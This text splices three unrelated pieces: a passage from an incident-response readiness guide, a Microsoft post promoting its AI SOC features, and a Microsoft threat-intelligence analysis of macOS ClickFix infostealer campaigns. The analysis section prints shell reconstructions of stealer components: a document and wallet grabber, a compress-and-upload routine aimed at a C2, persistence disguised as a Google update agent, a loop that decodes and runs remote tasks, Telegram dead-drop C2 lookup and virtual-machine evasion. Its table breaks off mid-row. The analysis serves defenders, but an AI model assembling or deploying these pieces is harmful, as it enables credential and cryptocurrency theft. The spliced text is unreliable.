Access is only useful if it can be activated immediately. If access depends on a chain of approvals, manual setup, or first-time configuration, it will fail when the pressure is highest.
Operational readiness means required accounts already exist across identity, cloud, EDR, and logging systems. MFA enrollment must already be completed. Permissions must already be approved and mapped to responder roles. The team responsible for enabling access must know exactly how to do it and must have practiced the procedure before.
On Day Zero, access should function like a switch: predefined, controlled, and fast to activate. Anything else is a delay, and in incident response, delay always benefits the attacker.
Communication under breach conditions
Access problems receive the most attention in readiness discussions, but communication failures are just as damaging. Even with perfect technical visibility, an incident response breaks down quickly if teams cannot coordinate, make decisions, and share sensitive information securely.
Assume normal channels may be compromised
During an active breach, organizations should assume that email, chat platforms, and internal collaboration tools may no longer be private. If the attacker has access to those systems, then discussions about containment, investigative findings, and next steps may also be visible.
That applies to internal conversations and communication with an external IR firm. Sharing credentials, containment plans, or investigative conclusions over a compromised channel can give the attacker visibility into your response in real time.
Establish out-of-band communication
Every organization needs an out-of-band communication method that is separate from corporate identity, production email, and the internal network. This could be a dedicated secure messaging platform, a preconfigured encrypted group, or a structured phone-based process. The specific tool matters less than the requirements.
The channel must be independent of the compromised environment. It must include internal responders and external retainer contacts. It must support secure sharing of sensitive information. Most importantly, it must be tested. A communication channel that has never been used is not a response plan. It is an experiment being conducted in the middle of a crisis.
Designate an incident manager
Every response needs a single point of coordination. This is not necessarily the most senior person in the room. It is the person with the clearest operational ownership and the authority to keep the response aligned.
The incident manager coordinates activity across security, IT, legal, leadership, and external responders. They control information flow, maintain a consistent picture of scope and status, and serve as the primary interface to the IR firm. Without that role, organizations drift into fragmented communication, conflicting instructions, and slow decision-making.
Define stakeholder notification paths
Who gets notified, when, and by whom should never become a live debate during an incident. Notification tiers need to be defined in advance. Internal escalation thresholds, executive updates, legal and regulatory decision-making, customer communications, and external messaging all need clear ownership.
Organizations should also define exactly what information is shared with the IR firm on initial contact, who acts as the consistent liaison, and how updates are handled. Poor communication is not just inconvenient. It measurably slows containment and increases damage.
Building a pre-approved IR access policy
A pre-approved incident response access policy exists to eliminate decision-making overhead at the worst possible moment. When an incident is declared, the question of who can access what should already be answered.
What the policy should define
The most common failure in IR access policies is vagueness. A statement such as “responders will be granted appropriate access upon incident declaration” is not an operational policy. It is a placeholder that guarantees confusion later.
An effective policy should clearly define who can declare an incident and trigger emergency procedures. This should not require a full executive chain. A CISO, security leader, or designated on-call authority should be empowered to make that call.
It should define who can approve temporary access for external responders without reopening procurement, legal review, or vendor onboarding. Those controls matter, but they are not built for incident timelines unless pre-cleared.
It should specify the scope of access by responder role, such as IR investigator or IR lead, rather than negotiating permissions during a live event. It should also define time-boxed access, with a clear review and revocation cadence, and designate who is responsible for removing access once the incident stabilizes.
Finally, it should require post-incident cleanup, access validation, and governance review. Governance should catch up after stabilization, not slow down the first hours of investigation.
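As an illustration only — the role names, system identifiers, and durations below are hypothetical, not a standard — a pre-approved access matrix can be captured in a simple policy file so that nothing has to be negotiated live:

```yaml
# Hypothetical pre-approved IR access policy (illustrative sketch)
declaration_authority: [ciso, security-oncall-lead]
roles:
  ir-investigator:
    access: [idp-readonly, edr-investigator, siem-query, cloud-audit-readonly]
    max_duration: 72h        # time-boxed; renewal requires incident-manager approval
  ir-lead:
    access: [idp-readonly, edr-responder, siem-query, cloud-audit-readonly]
    can_authorize: [host-isolation, credential-reset]
    max_duration: 72h
revocation_owner: identity-team
post_incident: [disable-accounts, access-review, governance-report]
```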
Pre-created accounts and tested workflows
Policy is only as good as the workflows behind it. If the accounts do not exist, the permissions have not been validated, or the identity team has never enabled them under realistic conditions, then the organization does not have a capability. It has documentation.
Dormant IR accounts should be created in advance across the identity provider, EDR, SIEM, and cloud tenants. They should be disabled by default, with a documented and tested enable procedure. MFA enrollment should already be complete. Hardware tokens or secure authentication workflows should be assigned before an incident occurs.
Role assignments should also be pre-approved. Enabling emergency access should be a single action, not the beginning of a conversation.
Background checks and legal friction
Background checks are a common friction point, especially in regulated sectors. The issue is not whether checks are appropriate. It is when they are enforced.
If background checks are first raised during an active incident, the organization has already failed the readiness test. Reputable IR firms handle vetting, certifications, and internal controls during onboarding. Those conversations belong in the retainer setup phase, not in the first hours of a breach.
The same is true of legal approval. If legal needs to decide in real time whether external responders can access production systems or regulated data, the response will slow immediately. Those decisions should be resolved before the incident.
A practical Day Zero readiness checklist
Organizations can test readiness by asking simple, operational questions.
Can a dormant IR account be enabled and used to pull authentication logs within 30 minutes?
Is a scoped read-only cloud role already defined, and are audit logs enabled across all relevant tenants?
Does the EDR platform have an investigator role that an external responder can use immediately, with access to at least 30 days of historical telemetry?
Can an external responder query the SIEM directly, and does retention cover at least 90 days across identity, endpoint, network, and cloud sources?
Who can authorize host isolation, VPN shutdown, credential rotation, or account suspension, and has that authority ever been exercised in a drill?
If any of these questions produce hesitation, uncertainty, or the phrase “we’ll figure it out during an incident,” then that area is not ready.
For organizations with an IR retainer, additional questions matter. Are dormant accounts already created for retainer responders? Is MFA preconfigured? Are legal approvals complete? Does the IR firm have current contact information for the incident manager, CISO, and identity lead? Is there an established out-of-band channel that includes the IR firm? Has the full activation workflow been tested in a tabletop exercise from initial call through working access?
If several of these answers are no, the retainer is a contract, not an operational capability.
What organizations commonly overlook
Even mature organizations with strong security tooling and formal plans routinely discover important gaps only after a real incident begins.
Backups are a common example. Many organizations know backup jobs are completing, but have not verified that backups are isolated from the environment that an attacker has already compromised. If the same credentials, networks, or service accounts can reach backup infrastructure, attackers may be able to destroy recovery options before deploying ransomware. A backup that has never been restored, and never been tested for isolation, is still an assumption.
Containment authority is another frequent gap. Teams may know whether a system should be isolated or credentials should be rotated, but no one has explicit authority to disrupt operations. As the decision moves through leadership, legal, finance, or business operations, the attacker remains active. Prepared organizations decide in advance which systems can be shut down immediately, who can authorize those actions, and how emergency decisions will be escalated when necessary.
Short or fragmented logging retention is also common. Logs may exist but only for seven to fourteen days, or they may be scattered across tools and teams with no centralized access. In those cases, the organization can often see what is happening now but not how it started.
Untested response plans are equally dangerous. Many plans look complete in a binder and fail in practice because people do not know their roles, approvals take too long, and critical steps have never been exercised. Testing does not need to be elaborate. It needs to be realistic, cross-functional, and honest about what breaks.
Finally, many organizations lack a current asset inventory or network map. Systems are deployed outside formal processes, cloud resources are spun up without central registration, and ownership is unclear. Responders cannot investigate what they do not know exists. Untracked assets are not just documentation gaps. They are blind spots that attackers actively exploit.
A readiness exercise you can run now
Most of the recommendations in this guide can be tested this week with the people and systems already in place.
Start with access. Create dormant IR accounts and measure how long it takes to enable them. Attempt to pull 90 days of authentication logs. Ask your EDR administrator to create or validate an external investigator role. Confirm cloud audit logging is enabled across all relevant tenants and that a scoped read-only role can be activated immediately.
Then test the response itself. Run a tabletop exercise in which the IR firm has just been called in. Measure how long it takes before they can access identity logs, endpoint telemetry, and cloud audit trails. Test whether the incident manager can be reached and whether the out-of-band channel can be established quickly. Run a containment decision through the approval chain and time it.
Whatever fails in that exercise will fail the same way during a real incident. The difference is that during a real breach, the attacker is operating inside that gap while the organization is still figuring it out.
Conclusion
Readiness is not a policy document, a signed retainer, or a successful audit. It is the result of practical decisions made before an incident begins: access provisioned, authority clarified, communication paths tested, and operational gaps closed before an attacker can exploit them.
The organizations that contain incidents quickly are rarely the ones with the most impressive slide decks. They are the ones who did the unglamorous work in advance. They created the accounts, tested the workflows, validated the logs, practiced the decisions, and ensured that when the call came in, the response could begin immediately.
That is the real meaning of Day Zero readiness: not just having help available but being prepared to use it the moment it matters most.
from The Hacker News https://ift.tt/pIMQs73
Security operations are entering a new phase. As attack techniques grow faster and more complex, the effectiveness of a SOC depends less on collecting more data and more on how well platforms can turn context into action at scale.
KuppingerCole Analysts’ 2026 Emerging AI Security Operations Center (SOC) report reflects this shift clearly: the future of security automation is not defined by static rules or isolated workflows, but by intelligence‑driven automation that supports analyst decision‑making across the full security lifecycle. This evolution mirrors what many security leaders already experience day to day: the limiting factor is no longer alert volume, but human capacity.
Microsoft is excited to be named an Overall Leader, and the Market Leader, in this report, as we see automation as a core component of the future of cybersecurity.
From playbook‑driven SOAR to intelligence‑led automation
Traditional security orchestration, automation, and response (SOAR) solutions were built to automate predictable, repeatable tasks: enrichment steps, ticket creation, notifications, and predefined containment actions. These capabilities remain valuable, but they were designed for an era when incidents followed more deterministic patterns.
Incidents today rarely follow those deterministic patterns. In many SOCs, analysts still spend significant time:
Stitching together context across alerts and data sources.
Manually triaging incidents that turn out to be benign.
Following repetitive investigation and response steps.
The result is slower response times and analyst burnout—at exactly the moment attackers are moving faster and operating more quietly.
Automation built into the analyst experience
Microsoft has evolved the way these common challenges can be addressed, leveraging machine learning, large language models (LLMs), and agents, including releases such as:
Automatic attack disruption: An always-on capability that limits lateral attackers and reduces the overall impact of an attack, from associated costs to loss of productivity, leaving security operations teams in complete control of investigating, remediating, and bringing assets back online.
Phishing triage agent: An agent that runs sophisticated assessments—including semantic evaluation of email content, URL and file inspection, and intent detection—to determine whether a submission is a true phishing threat or a false alarm.
AI powered incident prioritization: A machine learning prioritization model to surface the incidents that matter most, assigning each incident a priority score from 0–100 and explaining the key factors behind the ranking.
Playbook generator: An experience that allows users to create Python-code playbooks using natural language for flexible workflow automation.
These capabilities are just the beginning of how we are introducing agents and automation to help users move faster, freeing analysts to focus on higher‑value tasks like proactive hunting and threat analysis.
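To make the playbook idea concrete, here is a hedged sketch of the kind of Python playbook such a generator might emit. The helper actions (enrich, isolate, notify) are hypothetical stand-ins, not the actual Sentinel connector API:

```python
# Illustrative sketch only: the action strings below stand in for
# whatever connectors a real generated playbook would call.
def run_playbook(incident: dict) -> list[str]:
    """Decide which response actions a high-severity incident triggers."""
    actions = []
    if incident.get("severity") == "high":
        for ip in incident.get("source_ips", []):
            actions.append(f"enrich_ip({ip})")                   # threat-intel lookup
        if incident.get("confidence", 0) >= 90:
            actions.append(f"isolate_host({incident['host']})")  # containment step
        actions.append("notify(soc_oncall)")
    return actions

print(run_playbook({"severity": "high", "confidence": 95,
                    "host": "wks-042", "source_ips": ["203.0.113.7"]}))
```

The point of generating such code from natural language is that the branching logic stays reviewable and version-controllable, rather than hidden in a drag-and-drop workflow.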
The next evolution: The agentic SOC
The KuppingerCole report reinforces a broader industry trend, that security platforms must do more than automate pre‑defined workflows. They must support adaptive, intelligence‑driven operations that can respond to novel and fast‑moving threats.
This is where Microsoft is making its next set of investments: agentic security operations.
With innovations such as the Microsoft Sentinel MCP (Model Context Protocol) Server, shared security data and graph context, and deep integration with Microsoft Security Copilot, Sentinel is evolving into a platform where AI agents can:
Reason across identity, endpoint, cloud, and network signals.
Summarize incidents and investigations in natural language.
Assist with decision‑making by correlating weak signals over time.
Take action—with human oversight—when confidence thresholds are met.
These agents are designed to work alongside analysts, augmenting expertise and dramatically accelerating time to response.
Why this matters for security teams
The direction highlighted by KuppingerCole, and reflected in Microsoft’s roadmap, isn’t about chasing AI for its own sake. It’s about addressing real SOC pain points:
Scale: Human‑only operations don’t scale with modern attack surfaces.
Consistency: Automated and agent‑assisted workflows reduce variance and errors.
Speed: Faster reasoning and response directly reduce attacker dwell time.
By combining automation, rich context, and intelligent agents, Microsoft Sentinel helps SOC teams move from reactive alert handling to proactive, intelligence‑led defense without forcing teams to re‑architect their operations overnight.
Looking ahead
Security automation is no longer a bolt‑on capability. As KuppingerCole’s research makes clear, it is becoming a foundational element of modern security operations. The evolution of SOAR reflects the reality of a shift from static playbooks to adaptive, context‑aware assistance that scales human expertise.
Microsoft is investing accordingly, advancing an AI‑first approach to security analytics that helps SOC teams operate with greater speed, confidence, and resilience as threats continue to evolve. Read the Emerging AI Security Operations Center (SOC) report to learn more.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
Microsoft researchers continue to observe the evolution of an infostealer campaign distributing ClickFix‑style instructions and targeting macOS users. In this recent iteration, threat actors attempt to take advantage of users who are looking for helpful advice on macOS-related issues (for example, optimizing their disk space) in blog sites and other user-driven content platforms by hosting their malicious commands in these sites.
These commands, which purport to install system utilities, instead load infostealing malware such as Macsync, Shub Stealer, and AMOS onto the targets’ devices. The malware then collects and exfiltrates data, including media files, iCloud data, Keychain entries, and cryptocurrency wallets. In some campaigns, the malware replaces legitimate cryptocurrency wallet apps with trojanized versions, putting users at added risk.
Prior iterations of this campaign delivered the infostealers through disk image (.dmg) files that required users to manually install an application. This recent activity reflects a shift in tradecraft, where threat actors instruct users to run Terminal commands that leverage native utilities to retrieve remotely hosted content, followed by script‑based loader execution.
Unlike application bundles opened through Finder—which might be subjected to Gatekeeper verification checks such as code signing and notarization—scripts downloaded and launched directly through Terminal (for example, by using osascript or shell interpreters) don’t undergo the same evaluation. This delivery mechanism enables attackers to initiate malware execution through user‑driven command invocation, reducing reliance on traditional application delivery methods and increasing the likelihood of successful execution.
In this blog, we take a look at three campaigns that use this new tradecraft. We also provide mitigation guidance and detection details to help surface this threat.
Activity overview
Initial access
Standalone websites were seen hosting pages that included Base64-encoded instructions for end users to run. Some sites present this information in multiple languages. As of this writing, the websites we’ve observed are either already down or have been reported.
Figure 1. Landing page of a script campaign (domenpozh[.]net).
Figure 2. ClickFix instructions hosted on mac-storage-guide.squarespace[.]com.
Figure 3. The mac-storage-guide.squarespace[.]com page was seen presenting content in different languages, such as Japanese.
In other instances, content that included instructions leading to malware were observed to be hosted on Craft, a note-taking platform that lets writers and content creators take notes and distribute their content. We’ve observed that pages like macclean[.]craft[.]me were taken down relatively quickly.
Figure 4. ClickFix instruction hosted on macclean[.]craft[.]me.
Threat actors were also publishing fake troubleshooting posts on the popular blogging site Medium to distribute ClickFix instructions. These posts claim to solve common macOS problems. Blog sites such as macos-disk-space[.]medium[.]com instruct users to “fix” an issue by pasting a command into Terminal. The command then decodes and runs an AppleScript or Bash loader. These blogs were reported and taken down quickly.
We observed three distinct execution paths leveraging different infrastructure. We’re classifying these as a loader install campaign, a script install campaign, and a helper install campaign. In the loader and helper campaigns, we observed that a random seven-digit value (hereinafter referred to as the random ID) was used in data staging, marking the staging folders as /tmp/shub_<random ID> or /tmp/<random ID>.
The underlying goal remains the same in these campaigns: sensitive data collection, persistence, and exfiltration.
The following table summarizes the key differences between the campaigns. We discuss the details of each of these campaigns in the succeeding sections of this blog.
| Activity or technique | Loader campaign | Script campaign | Helper campaign |
| --- | --- | --- | --- |
| Initial installation | No file written on disk | No file written on disk | /tmp/helper, /tmp/update |
| Condition to exit execution | Russian keyboard detected | Failure to resolve an active command-and-control (C2) endpoint (all infrastructure checks fail) | Not applicable (handled in later loader/payload stages) |

Trezor Suite.app, Ledger Wallet.app
Loader install campaign
Since February 2026, Microsoft researchers have observed a campaign in which, once a user copies and runs the ClickFix commands in Terminal, a shell loader is fetched from the attacker’s infrastructure using curl, leading to execution of a second-stage shell script.
This second shell script is a zsh loader that decodes and decompresses an embedded payload using Base64 and Gzip, respectively. It then executes the payload using eval.
Figure 5: Shell loader.
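The decode-and-decompress stage is easy to reproduce safely for analysis. A minimal Python sketch of the same Base64 + Gzip unwrapping, using a harmless stand-in payload and printing instead of eval-ing:

```python
import base64
import gzip

# Build a stand-in for the embedded blob the zsh loader carries.
payload = b'echo "next-stage script would run here"'
blob = base64.b64encode(gzip.compress(payload)).decode()

# What the loader does: base64-decode, then gunzip -- but print, never eval.
recovered = gzip.decompress(base64.b64decode(blob))
print(recovered.decode())
```

The same two-step unwrapping, applied to a captured sample’s blob, yields the next-stage script for static review without executing it.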
The next-stage script also functions as a macOS reconnaissance and execution-control loader that first fingerprints the system by collecting the following information:
Keyboard locale
Hostname
Operating system version
External IP address
It then builds and sends a JSON object to an attacker‑controlled server containing an event name (loader_requested or cis_blocked) along with this telemetry. It also uses the presence of Russian/CIS keyboard layouts as a deliberate kill switch, reporting a cis_blocked event and stopping execution.
Figure 6: Reconnaissance loader with CIS kill switch.
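The kill-switch decision reduces to a simple membership check. A sketch of that logic; the layout names below are illustrative examples, not an exhaustive list taken from the sample:

```python
# Illustrative recreation of the loader's kill-switch decision.
CIS_LAYOUTS = {"Russian", "Ukrainian", "Belarusian", "Kazakh"}  # example set

def choose_event(enabled_layouts: list[str]) -> str:
    """Return the telemetry event the loader would report."""
    if CIS_LAYOUTS & set(enabled_layouts):
        return "cis_blocked"       # abort: CIS keyboard layout present
    return "loader_requested"      # proceed to fetch the AppleScript payload

print(choose_event(["U.S.", "Russian"]))  # cis_blocked
print(choose_event(["U.S."]))             # loader_requested
```

Kill switches like this are common in crimeware and are themselves a useful detection signal: benign installers have no reason to enumerate keyboard layouts before phoning home.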
If the system isn’t blocked, the script silently beacons a “loader requested” event and then downloads and executes a remote AppleScript payload directly in memory using osascript.
Figure 7: Reconnaissance loader with AppleScript payload delivery.
AppleScript infostealer
This multi-stage macOS AppleScript stealer captures credentials through user interaction, conducts broad data collection across browsers, Keychains, messaging applications, wallet artifacts, and user documents, and stages the collected data into a compressed archive for exfiltration to a remote endpoint. The malware also tampers with locally installed applications to intercept sensitive data, establishes persistence through a masqueraded LaunchAgent that mimics legitimate software updates, and maintains remote command execution capabilities by periodically polling a server for instructions, which are executed at runtime.
Data collection: /tmp/shub_<random ID> staging
We observed that the stealer self-identifies as “SHub Stealer” (it writes the marker SHub into its staging directory). It prompts the target user to enter their password, pretending to install a “helper” utility. It then validates the entered password using the command dscl . -authonly <username>. Upon successful validation, it sends a password_obtained event to its C2 infrastructure.
The malware stages collected data under a /tmp/shub_<random ID>/ folder. The collected data includes:
Browser credentials
Notes
Media files
Telegram data
Cryptocurrency wallets
Keychain entries
iCloud account data
The stealer also collects documents smaller than 2 MB and stages them within a FileGrabber repository located at /tmp/shub_<random ID>/FileGrabber/.
The targeted file types are:
txt
pdf
docx
wallet
key
keys
doc
jpeg
png
kdbx
rtf
jpg
seed
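A FileGrabber stage like the one described — documents under 2 MB with targeted extensions copied into a staging folder — can be sketched with find. The function name and paths below are illustrative; only the size gate and extension list come from the observed behavior:

```shell
#!/bin/sh
# Illustrative sketch of the FileGrabber stage: sweep a directory tree for
# files with targeted extensions under the 2 MB cutoff and copy them into
# the staging folder (the real stealer uses /tmp/shub_<random ID>/FileGrabber).
grab_files() {
    src="$1"      # directory to sweep (the stealer targets the user profile)
    stage="$2"    # staging destination
    mkdir -p "$stage"
    find "$src" -type f -size -2M \
        \( -name '*.txt' -o -name '*.pdf' -o -name '*.docx' -o -name '*.doc' \
           -o -name '*.rtf' -o -name '*.jpg' -o -name '*.jpeg' -o -name '*.png' \
           -o -name '*.kdbx' -o -name '*.wallet' -o -name '*.key' -o -name '*.keys' \
           -o -name '*.seed' \) \
        -exec cp {} "$stage/" \; 2>/dev/null
}
```

Defenders can hunt for exactly this shape: a file enumeration sweep followed by many copies into a /tmp staging path.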
Once the data collection is complete, data is compressed and exfiltrated. The stealer deletes staging artifacts to reduce forensic evidence.
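The compress-exfiltrate-clean sequence can be sketched as follows. The archiver and endpoint are stand-ins (tar here; the exact archive format and C2 URL aren’t shown in this section), and the upload call is deliberately left inert:

```shell
#!/bin/sh
# Sketch of the compress-exfiltrate-clean sequence. tar is a stand-in
# archiver; the C2 URL is a placeholder and the upload is commented out.
stage_and_ship() {
    stage="$1"                              # e.g. /tmp/shub_<random ID>
    archive="${stage}.tar.gz"
    # Compress everything staged so far into a single archive.
    tar -czf "$archive" -C "$(dirname "$stage")" "$(basename "$stage")"
    # Exfiltrate (disabled): curl -s -X POST -F "file=@${archive}" "$C2/upload"
    # Delete the staging folder to reduce forensic evidence; the real stealer
    # removes the archive as well once the upload completes.
    rm -rf "$stage"
    echo "$archive"
}
# Example: stage_and_ship /tmp/shub_1234567
```

The tell-tale sequence for detection is archive creation over sensitive paths, an outbound POST, and immediate deletion of the staging folder.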
Wallet exfiltration and trojanization
Subsequently, the stealer probes the system for the presence of any of the following cryptocurrency wallet applications:
Electrum
Coinomi
Exodus
Atomic
Wasabi
Ledger Live
Monero
Bitcoin
Litecoin
DashCore
Electrum_LTC
Electron_Cash
Guarda
Dogecoin
Trezor_Suite
Sparrow
When it finds any of these applications, it stages their data for exfiltration.
The stealer was also observed replacing legitimate cryptocurrency wallet apps with attacker-controlled or trojanized ones:
Ledger Wallet.app is replaced by app.zip fetched from <C2 domain>/zxc/app.zip
Trezor Suite.app is replaced by apptwo.zip fetched from <C2 domain>/zxc/apptwo.zip
Exodus.app is replaced by appex.zip fetched from <C2 domain>/zxc/appex.zip
These trojanized cryptocurrency wallet applications pose a serious risk to users, who might be unaware of the stealthy compromise and continue to use and transact with them.
Figure 8. Trojanized apps installation.
Persistence
For persistence, the malware creates an additional script within the newly created ~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/ folder.
A malicious implant named GoogleUpdate is configured with RunAtLoad and disguised as a legitimate update agent. Microsoft Defender Antivirus detects this implant as Trojan:MacOS/SuspMalScript.
A new property list (plist), /Library/LaunchAgents/com.google.keystone.agent.plist, is then staged to run this agent.
Figure 9. Plist staging.
The executable is then given permission to run with the following command:
Figure 10. GoogleUpdate granted permission to run.
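The persistence pieces fit together as below. The plist keys follow the standard launchd schema; the exact contents the malware writes are those shown in Figure 9, so treat this as an illustrative reconstruction:

```shell
#!/bin/sh
# Reconstruction of the persistence plist staging. Key names follow the
# standard launchd schema; the malware's actual plist contents are shown in
# Figure 9, so this stand-in is illustrative only.
AGENT="$HOME/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate"

write_plist() {
    cat <<EOF
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.google.keystone.agent</string>
    <key>ProgramArguments</key>
    <array><string>${AGENT}</string></array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>
EOF
}
# The malware then marks the implant executable and loads the agent, e.g.:
#   chmod +x "$AGENT"
#   launchctl load /Library/LaunchAgents/com.google.keystone.agent.plist
```

The masquerade works because com.google.keystone.agent is the label legitimate Google software updaters use, so the entry blends in with expected LaunchAgents.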
Once com.google.keystone.agent.plist loads, it functions as a backdoor-style bot component that registers the infected macOS system with attacker infrastructure at <C2 domain>/api/bot/heartbeat, uniquely identifies the host using a hardware-derived ID, and periodically beacons system metadata such as hostname, operating system version, and external IP address.
The C2 server can return Base64-encoded instructions, which the script decodes, executes locally, and then deletes traces of, enabling remote command execution on demand. This creates a persistent remote-control channel through which the attacker can push arbitrary shell commands to the infected device at any time.
Figure 11. Backdoor style bot with heartbeat driven payload execution.
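The heartbeat loop reduces to: beacon metadata, receive a Base64-encoded task, decode, execute, clean up. In this sketch the network transport is stubbed (the real bot POSTs to <C2 domain>/api/bot/heartbeat with curl and identifies the host with a hardware-derived ID) and the queued task is benign:

```shell
#!/bin/sh
# Sketch of one heartbeat iteration. fetch_task is a stub: in the real bot it
# would be a curl POST to <C2 domain>/api/bot/heartbeat carrying telemetry.
fetch_task() {
    # Stub returning a Base64-encoded benign task, as the C2 would.
    printf 'echo task-ran' | base64
}

heartbeat_once() {
    host="$(uname -n)"   # part of the beaconed metadata (hostname, OS, IP)
    task="$(fetch_task)"
    if [ -n "$task" ]; then
        # Decode and execute whatever the operator queued; the real bot then
        # deletes traces of the command.
        printf '%s' "$task" | base64 -d | sh
    fi
}

heartbeat_once   # prints: task-ran
```

Run in a loop, this gives the operator on-demand shell execution without ever writing a payload to disk.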
Script install campaign
In April 2026, Microsoft researchers observed an ongoing campaign in which users are lured into running a heavily obfuscated infostealer through Terminal.
The attack begins with a social-engineering instruction containing a Base64-encoded command.
When decoded, this instruction resolves to a one-line shell pipeline that retrieves a remote script, which is then handed off immediately for execution. By encoding the command and streaming its output directly into the shell, the attacker avoids placing a recognizable payload on disk during the initial stage.
Figure 12. Payload delivery.
The retrieved script.sh payload is launched directly from the network stream, with no intermediate file written to disk. It’s responsible for establishing persistence and deploying follow-on functionality. It delivers the second-stage Base64-encoded script under a plist staged at ~/Library/LaunchAgent/com.<random name>.plist.
Figure 13. Payload staged into a plist.
The persisted AppleScript is heavily obfuscated in its original form (character ID concatenation). After decoding, the key logic follows:
Figure 14. AppleScript stager (decoded).
This AppleScript functions as a C2 discovery and execution orchestrator for the macOS malware campaign, using AppleScript as the control layer and standard Unix tools for network interaction and execution. Its first role is C2 discovery: it iterates over a list of potential server identifiers (for example, {0x666[.]info}), constructs candidate URLs (http://<value>/), and probes them using curl with a realistic Chrome macOS user agent and a benign POST body (-d "check"). This connectivity test is performed through the following command:
If none of the hard-coded infrastructure responds successfully, the script falls back to Telegram-based C2 discovery. It fetches a Telegram bot page using curl -s hxxps://t[.]me/ax03bot and extracts a hidden server identifier embedded in an HTML <span dir="auto"> element using sed. This lets the attacker rotate C2 infrastructure dynamically.
Figure 16. Telegram-based C2 endpoint discovery.
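The dead-drop extraction is a one-line sed over the fetched page. In this sketch the fetch is replaced with a simplified sample of the bot page (the sample HTML and identifier are placeholders; the real script pulls the page with curl):

```shell
#!/bin/sh
# Reconstruction of the Telegram dead-drop lookup. The page fetch is stubbed
# with simplified sample HTML; the real script retrieves the bot page via
# curl -s and pipes it through the same sed extraction.
extract_c2() {
    # Pull the hidden server identifier out of the <span dir="auto"> element.
    sed -n 's/.*<span dir="auto">\([^<]*\)<\/span>.*/\1/p'
}

sample='<p><span dir="auto">example-c2.invalid</span></p>'
printf '%s' "$sample" | extract_c2   # prints: example-c2.invalid
```

Because the operator only has to edit the bot’s profile text to point infected hosts at new infrastructure, takedowns of individual C2 domains don’t break the channel.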
Once a working C2 endpoint is identified, the script moves into execution orchestration. It sends a final POST request to the resolved server containing a transaction ID (txid) and module identifier, then immediately pipes the server response into osascript for execution:
This command enables arbitrary AppleScript execution directly from the server, fully in memory, with no payload written to disk. Output and errors are suppressed, and execution only proceeds if all connectivity checks succeed. Overall, this isn’t a simple downloader but a resilient, infrastructure‑aware loader designed to dynamically discover C2 endpoints, evade takedowns, and execute attacker‑controlled AppleScript logic on demand.
We observed data exfiltration to the attacker’s infrastructure on a C2/upload.php endpoint leveraging curl.
Figure 17. Exfiltration of archived data.
Helper install campaign (AMOS)
Starting at the end of January 2026, another ClickFix campaign relied on an executable file named helper or update. In this campaign, once a user ran the encoded ClickFix instructions, a first-stage script decoded a Base64 payload and then decompressed it using Gunzip.
Figure 18. First-stage script requested.
The first-stage script led to the retrieval of the second-stage malicious Mach object (Mach-O) executable into the newly created /tmp/<file name> folder.
Figure 19. /tmp/helper installation.
In February 2026, this campaign retrieved the payload under a /tmp/update folder.
Figure 20. /tmp/update installation.
This malicious executable file has its extended attributes removed and is then given permission to run and launch on the victim’s device.
Virtualization detection
The infection chain begins with an AppleScript-based stager that uses array subtraction obfuscation to conceal its strings and commands. This stager performs an anti-analysis gate by invoking system_profiler and inspecting both memory and hardware profiles. Specifically, it searches for common virtualization indicators such as QEMU, VMware, and KVM. In addition to explicit hypervisor vendor strings, the script also checks for a set of generic hardware artifacts commonly observed in virtualized or analysis environments, including:
Chip: Unknown
Intel Core 2
Virtual Machine
VirtualMac
If any of these indicators are present, execution is terminated early, preventing further stages from running.
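The gate amounts to a substring match over the hardware profile. A minimal sketch, with the profile text passed in as an argument (on a real host it would come from system_profiler output):

```shell
#!/bin/sh
# Sketch of the anti-VM gate. The profile text is an argument here; the real
# stager reads it from system_profiler's memory and hardware sections.
is_virtualized() {
    profile="$1"
    for needle in QEMU VMware KVM "Chip: Unknown" "Intel Core 2" \
                  "Virtual Machine" VirtualMac; do
        case "$profile" in
            *"$needle"*) return 0 ;;   # indicator found: analysis environment
        esac
    done
    return 1
}

if is_virtualized "Model Name: Virtual Machine"; then
    echo "analysis environment detected, exiting"
fi
```

Sandboxes that report generic hardware strings like these never reach the later stealer stages, which is why detonation environments should present realistic hardware profiles.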
Data collection and exfiltration
Like the loader install campaign, the stealer prompts the user to enter their password. It validates locally whether the entered password is correct using the dscl utility.
After capturing the target user’s password, the malware then focuses on stealing high-value credentials and financial artifacts. It copies macOS Keychain databases, enabling access to stored website passwords, application secrets, and WiFi credentials.
It also collects browser authentication material from Chromium‑based browsers, including saved usernames and passwords, session cookies, autofill data, and browser profile state that can be reused for account takeover. In addition, the script targets cryptocurrency wallets, copying data associated with both browser‑based and desktop wallets. This includes browser extensions such as MetaMask and Phantom, as well as desktop wallets including Exodus and Electrum.
The stealer compresses collected data into a ZIP file /tmp.out.zip, which is then exfiltrated to a <C2 domain>/contact endpoint. The stealer removes staging artifacts to reduce forensic evidence.
Figure 21. Archiving and exfiltration of data.
Wallet exfiltration and trojanization
Similar to the loader campaign, the stealer in the helper campaign also replaces legitimate wallet apps with attacker-controlled ones:
Ledger Wallet.app is replaced by app.zip fetched from <C2 domain>/zxc/app.zip
Trezor Suite.app is replaced by apptwo.zip fetched from <C2 domain>/zxc/apptwo.zip
Backdoor deployment and persistence
To maintain long‑term access to infected systems, the helper campaign deploys a multi‑stage persistence mechanism built around two cooperating components: a primary backdoor binary and a lightweight execution wrapper.
Download and execution of the backdoor component (.mainhelper)
The persistence chain begins with the download of a second‑stage backdoor implant named .mainhelper into the current user’s home directory. As shown in Figure 22, the obfuscated AppleScript issues a network retrieval command that fetches this Mach‑O executable from an attacker-controlled endpoint (<C2 domain>/zxc/kito) and writes it as a hidden file under the user profile.
Figure 22. Second implant downloaded.
Once it’s given attributes and permissions to run, the .mainhelper implant connects the compromised device to the C2 endpoint hxxp://45.94.47[.]204/api/. The implant executes tasks from the attacker, providing remote-control capability over the compromised system.
Figure 23. C2 instance.
Creation of the execution wrapper (.agent)
In addition to the backdoor binary, the stealer creates a secondary file named .agent, also placed in the user’s home directory. Unlike .mainhelper, .agent isn’t a full implant. Instead, it is a lightweight shell wrapper whose sole purpose is to launch and supervise the .mainhelper process. The script writes the wrapper to disk and configures it so that, if the backdoor process terminates or crashes, .agent relaunches it.
